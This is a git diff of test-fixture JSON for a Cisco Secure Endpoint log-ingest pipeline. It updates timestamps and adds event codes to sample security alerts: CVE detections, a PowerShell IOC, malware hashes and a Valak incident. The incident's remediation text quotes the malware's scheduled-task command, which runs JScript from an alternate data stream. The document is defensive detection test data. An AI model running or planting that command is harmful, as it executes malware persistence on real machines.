                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1519340132474871000,\"timestamp\":1608874241,\"timestamp_nanoseconds\":474861000,\"date\":\"2020-12-25T05:30:41+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1608874241,\"start_date\":\"2020-12-25T05:30:41+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.\",\"short_description\":\"W32.WinWord.Powershell\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7\"}}}}}",
+                "code": "1107296274",
                 "kind": "alert",
                 "start": "2020-12-25T05:30:41.000Z",
                 "action": "Cloud IOC",
@@ -3568,8 +3611,9 @@
             },
             "event": {
                 "severity": 1,
-                "ingested": "2021-09-27T00:40:55.631444149Z",
+                "ingested": "2021-09-30T00:13:59.322515282Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15193384389977,\"timestamp\":1608872547,\"timestamp_nanoseconds\":0,\"date\":\"2020-12-25T05:02:27+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1608872547,\"start_date\":\"2020-12-25T05:02:27+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"mshtml.dll\",\"identity\":{\"sha256\":\"d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Internet Explorer\",\"version\":\"11\",\"cve\":\"CVE-2018-0762\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762\"},{\"cve\":\"CVE-2018-0772\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772\"}]}}",
+                "code": "1107296279",
                 "kind": "alert",
                 "start": "2020-12-25T05:02:27.000Z",
                 "action": "Vulnerable Application Detected",
@@ -3667,8 +3711,9 @@
             },
             "event": {
                 "severity": 1,
-                "ingested": "2021-09-27T00:40:55.631446051Z",
+                "ingested": "2021-09-30T00:13:59.322517491Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15193384371995,\"timestamp\":1608872546,\"timestamp_nanoseconds\":0,\"date\":\"2020-12-25T05:02:26+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1608872546,\"start_date\":\"2020-12-25T05:02:26+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"mshtml.dll\",\"identity\":{\"sha256\":\"1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Internet Explorer\",\"version\":\"11\",\"cve\":\"CVE-2018-0762\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762\"},{\"cve\":\"CVE-2018-0772\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772\"}]}}",
+                "code": "1107296279",
                 "kind": "alert",
                 "start": "2020-12-25T05:02:26.000Z",
                 "action": "Vulnerable Application Detected",
@@ -3766,8 +3811,9 @@
             },
             "event": {
                 "severity": 1,
-                "ingested": "2021-09-27T00:40:55.631447963Z",
+                "ingested": "2021-09-30T00:13:59.322519685Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15193366641599,\"timestamp\":1608870773,\"timestamp_nanoseconds\":0,\"date\":\"2020-12-25T04:32:53+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1608870773,\"start_date\":\"2020-12-25T04:32:53+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"OUTLOOK.EXE\",\"identity\":{\"sha256\":\"465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"71854d2c40664493e05c0a7e4f0c7cc74ada1a63eec1d4fe32350f6af8728243\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Office\",\"version\":\"2016\",\"cve\":\"CVE-2017-0106\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0106\"},{\"cve\":\"CVE-2017-11774\",\"score\":\"6.8\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11774\"},{\"cve\":\"CVE-2017-8506\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8506\"},{\"cve\":\"CVE-2017-8507\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8507\"},{\"cve\":\"CVE-2017-8571\",\"score\":\"6.8\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8571\"},{\"cve\":\"CVE-2017-8663\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8663\"},{\"cve\":\"CVE-2018-0791\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0791\"}]}}",
+                "code": "1107296279",
                 "kind": "alert",
                 "start": "2020-12-25T04:32:53.000Z",
                 "action": "Vulnerable Application Detected",
@@ -3881,11 +3927,12 @@
             },
             "event": {
                 "severity": 0,
-                "action": "Policy Update",
-                "ingested": "2021-09-27T00:40:55.631449874Z",
+                "ingested": "2021-09-30T00:13:59.322521941Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525498672153625000,\"timestamp\":1608870165,\"timestamp_nanoseconds\":878000000,\"date\":\"2020-12-25T04:22:45+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}",
-                "id": "6525498672153625000",
-                "kind": "alert"
+                "code": "553648130",
+                "kind": "alert",
+                "action": "Policy Update",
+                "id": "6525498672153625000"
             },
             "cisco": {
                 "secure_endpoint": {
@@ -3936,11 +3983,12 @@
             },
             "event": {
                 "severity": 0,
-                "action": "Scan Completed, No Detections",
-                "ingested": "2021-09-27T00:40:55.631451801Z",
+                "ingested": "2021-09-30T00:13:59.322524139Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525494703603843000,\"timestamp\":1608869241,\"timestamp_nanoseconds\":928000000,\"date\":\"2020-12-25T04:07:21+00:00\",\"event_type\":\"Scan Completed, No Detections\",\"event_type_id\":554696715,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"scan\":{\"description\":\"Flash Scan\",\"clean\":true,\"scanned_files\":2872,\"scanned_processes\":49,\"scanned_paths\":0,\"malicious_detections\":0}}}",
-                "id": "6525494703603843000",
-                "kind": "alert"
+                "code": "554696715",
+                "kind": "alert",
+                "action": "Scan Completed, No Detections",
+                "id": "6525494703603843000"
             },
             "cisco": {
                 "secure_endpoint": {
@@ -3999,11 +4047,12 @@
             },
             "event": {
                 "severity": 0,
-                "action": "Scan Started",
-                "ingested": "2021-09-27T00:40:55.631453708Z",
+                "ingested": "2021-09-30T00:13:59.322526324Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525494527510184000,\"timestamp\":1608869200,\"timestamp_nanoseconds\":537000000,\"date\":\"2020-12-25T04:06:40+00:00\",\"event_type\":\"Scan Started\",\"event_type_id\":554696714,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"scan\":{\"description\":\"Flash Scan\"}}}",
-                "id": "6525494527510184000",
-                "kind": "alert"
+                "code": "554696714",
+                "kind": "alert",
+                "action": "Scan Started",
+                "id": "6525494527510184000"
             },
             "cisco": {
                 "secure_endpoint": {
diff --git a/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp2.log b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp2.log
similarity index 100%
rename from packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp2.log
rename to packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp2.log
diff --git a/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp2.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp2.log-expected.json
similarity index 97%
rename from packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp2.log-expected.json
rename to packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp2.log-expected.json
index e1b9264db84..5e7cd1ad897 100644
--- a/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp2.log-expected.json
+++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp2.log-expected.json
@@ -51,8 +51,9 @@
             "event": {
                 "severity": 4,
                 "action": "SecureX Threat Hunting Incident",
-                "ingested": "2021-09-27T00:41:08.619280442Z",
+                "ingested": "2021-09-30T00:14:16.070123141Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"timestamp\":1610711992,\"timestamp_nanoseconds\":155518026,\"date\":\"2021-01-15T11:59:52+00:00\",\"event_type\":\"SecureX Threat Hunting Incident\",\"event_type_id\":1107296344,\"connector_guid\":\"test_connector_guid\",\"severity\":\"Critical\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Threat_Hunting\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"87:c2:d9:a2:8c:74\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"threat_hunting\":{\"incident_report_guid\":\"6e5292d5-248c-49dc-839d-201bcba64562\",\"incident_hunt_guid\":\"4bdbaf20-020f-4bb5-9da9-585da0e07817\",\"incident_title\":\"Valak Variant\",\"incident_summary\":\"The host Demo_Threat_Hunting is compromised by a Valak malware variant.  Valak is a multi-stage malware attack that uses screen capture, reconnaissance, geolocation, and fileless execution techniques to infiltrate and exfiltrate sensitive information.  Based on the event details listed and the techniques used, we recommend the host in question be investigated further.\",\"incident_remediation\":\"We recommend the following:\\r\\n\\r\\n- Isolation of the affected hosts from the network\\r\\n- Perform forensic investigation\\r\\n    - Review all activity performed by the user\\r\\n    - Upload any suspicious files to ThreatGrid for analysis\\r\\n    - Search the registry for data \\\"var config = ( COMMAND_C2\\\" and remove the key\\r\\n    - Review scheduled tasks and cancel any involving the execution of WSCRIPT.EXE //E:jscript C:\\\\Users\\\\Public\\\\PowerManagerSpm.jar:LocalZone lqjsxokgowhbxjaetyrifnbigtcxmuj eimljujnv\\r\\n    - Remove the Alternate Data Stream file located C:\\\\Users\\\\Public\\\\PowerManagerSpm.jar:LocalZone.\\r\\n- If possible, reimage the affected system to prevent potential unknown persistence methods.\",\"incident_id\":416,\"tactics\":[{\"name\":\"Defense Evasion\",\"description\":\"\u003cp\u003eThe adversary is trying to avoid being detected.\u003c/p\u003e\\n\\n\u003cp\u003eDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.\u003c/p\u003e\\n\",\"external_id\":\"TA0005\",\"mitre_name\":\"tactic\",\"mitre_url\":\"https://attack.mitre.org/tactics/TA0005\"}],\"techniques\":[{\"name\":\"Data from Local System\",\"description\":\"\u003cp\u003eAdversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may do this using a \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e, such as \u003ca href=\\\"https://attack.mitre.org/software/S0106\\\"\u003ecmd\u003c/a\u003e, which has functionality to interact with the file system to gather information. Some adversaries may also use \u003ca href=\\\"https://attack.mitre.org/techniques/T1119\\\"\u003eAutomated Collection\u003c/a\u003e on the local system.\u003c/p\u003e\\n\",\"external_id\":\"T1005\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1005\",\"tactics_names\":\"Collection\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":\"Privileges to access certain files and directories\",\"permissions\":\"\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters\"},{\"name\":\"Scheduled Task/Job\",\"description\":\"\u003cp\u003eAdversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).\u003c/p\u003e\\n\",\"external_id\":\"T1053\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1053\",\"tactics_names\":\"Execution, Persistence, Privilege Escalation\",\"platforms\":\"Windows, Linux, macOS\",\"system_requirements\":null,\"permissions\":\"Administrator, SYSTEM, User\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters, Windows event logs\"},{\"name\":\"Scripting\",\"description\":\"\u003cp\u003e\u003cstrong\u003eThis technique has been deprecated. Please use \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e where appropriate.\u003c/strong\u003e\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and \u003ca href=\\\"https://attack.mitre.org/techniques/T1086\\\"\u003ePowerShell\u003c/a\u003e but could also be in the form of command-line batch scripts.\u003c/p\u003e\\n\\n\u003cp\u003eScripts can be embedded inside Office documents as macros that can be set to execute when files used in \u003ca href=\\\"https://attack.mitre.org/techniques/T1193\\\"\u003eSpearphishing Attachment\u003c/a\u003e and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through \u003ca href=\\\"https://attack.mitre.org/techniques/T1203\\\"\u003eExploitation for Client Execution\u003c/a\u003e, where adversaries will rely on macros being allowed or that the user will accept to activate them.\u003c/p\u003e\\n\\n\u003cp\u003eMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)\u003c/p\u003e\\n\",\"external_id\":\"T1064\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1064\",\"tactics_names\":\"Defense Evasion, Execution\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":null,\"permissions\":\"User\",\"data_sources\":\"Process monitoring, File monitoring, Process command-line parameters\"}],\"severity\":\"critical\",\"incident_start_time\":1610707688,\"incident_end_time\":1592478770},\"tactics\":[{\"name\":\"Defense Evasion\",\"description\":\"\u003cp\u003eThe adversary is trying to avoid being detected.\u003c/p\u003e\\n\\n\u003cp\u003eDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.\u003c/p\u003e\\n\",\"external_id\":\"TA0005\",\"mitre_name\":\"tactic\",\"mitre_url\":\"https://attack.mitre.org/tactics/TA0005\"}],\"techniques\":[{\"name\":\"Data from Local System\",\"description\":\"\u003cp\u003eAdversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may do this using a \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e, such as \u003ca href=\\\"https://attack.mitre.org/software/S0106\\\"\u003ecmd\u003c/a\u003e, which has functionality to interact with the file system to gather information. Some adversaries may also use \u003ca href=\\\"https://attack.mitre.org/techniques/T1119\\\"\u003eAutomated Collection\u003c/a\u003e on the local system.\u003c/p\u003e\\n\",\"external_id\":\"T1005\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1005\",\"tactics_names\":\"Collection\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":\"Privileges to access certain files and directories\",\"permissions\":\"\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters\"},{\"name\":\"Scheduled Task/Job\",\"description\":\"\u003cp\u003eAdversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).\u003c/p\u003e\\n\",\"external_id\":\"T1053\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1053\",\"tactics_names\":\"Execution, Persistence, Privilege Escalation\",\"platforms\":\"Windows, Linux, macOS\",\"system_requirements\":null,\"permissions\":\"Administrator, SYSTEM, User\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters, Windows event logs\"},{\"name\":\"Scripting\",\"description\":\"\u003cp\u003e\u003cstrong\u003eThis technique has been deprecated. Please use \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e where appropriate.\u003c/strong\u003e\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and \u003ca href=\\\"https://attack.mitre.org/techniques/T1086\\\"\u003ePowerShell\u003c/a\u003e but could also be in the form of command-line batch scripts.\u003c/p\u003e\\n\\n\u003cp\u003eScripts can be embedded inside Office documents as macros that can be set to execute when files used in \u003ca href=\\\"https://attack.mitre.org/techniques/T1193\\\"\u003eSpearphishing Attachment\u003c/a\u003e and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through \u003ca href=\\\"https://attack.mitre.org/techniques/T1203\\\"\u003eExploitation for Client Execution\u003c/a\u003e, where adversaries will rely on macros being allowed or that the user will accept to activate them.\u003c/p\u003e\\n\\n\u003cp\u003eMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)\u003c/p\u003e\\n\",\"external_id\":\"T1064\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1064\",\"tactics_names\":\"Defense Evasion, Execution\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":null,\"permissions\":\"User\",\"data_sources\":\"Process monitoring, File monitoring, Process command-line parameters\"}]}}",
+                "code": "1107296344",
                 "kind": "alert"
             },
             "cisco": {
@@ -190,8 +191,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:08.619284815Z",
+                "ingested": "2021-09-30T00:14:16.070128592Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180352115244794000,\"timestamp\":1610709638,\"timestamp_nanoseconds\":279000000,\"date\":\"2021-01-15T11:20:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.GenericKD:ZVETJ.18gs.1201\",\"detection_id\":\"6180352115244793858\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"wsymqyv90.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Local\\\\Temp\\\\OUTLOOK_TEMP\\\\wsymqyv90.exe\",\"identity\":{\"sha256\":\"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40\",\"sha1\":\"70aef829bec17195e6c8ec0e6cba0ed39f97ba48\",\"md5\":\"e2f5dcd966e26d54329e8d79c7201652\"},\"parent\":{\"process_id\":4040,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
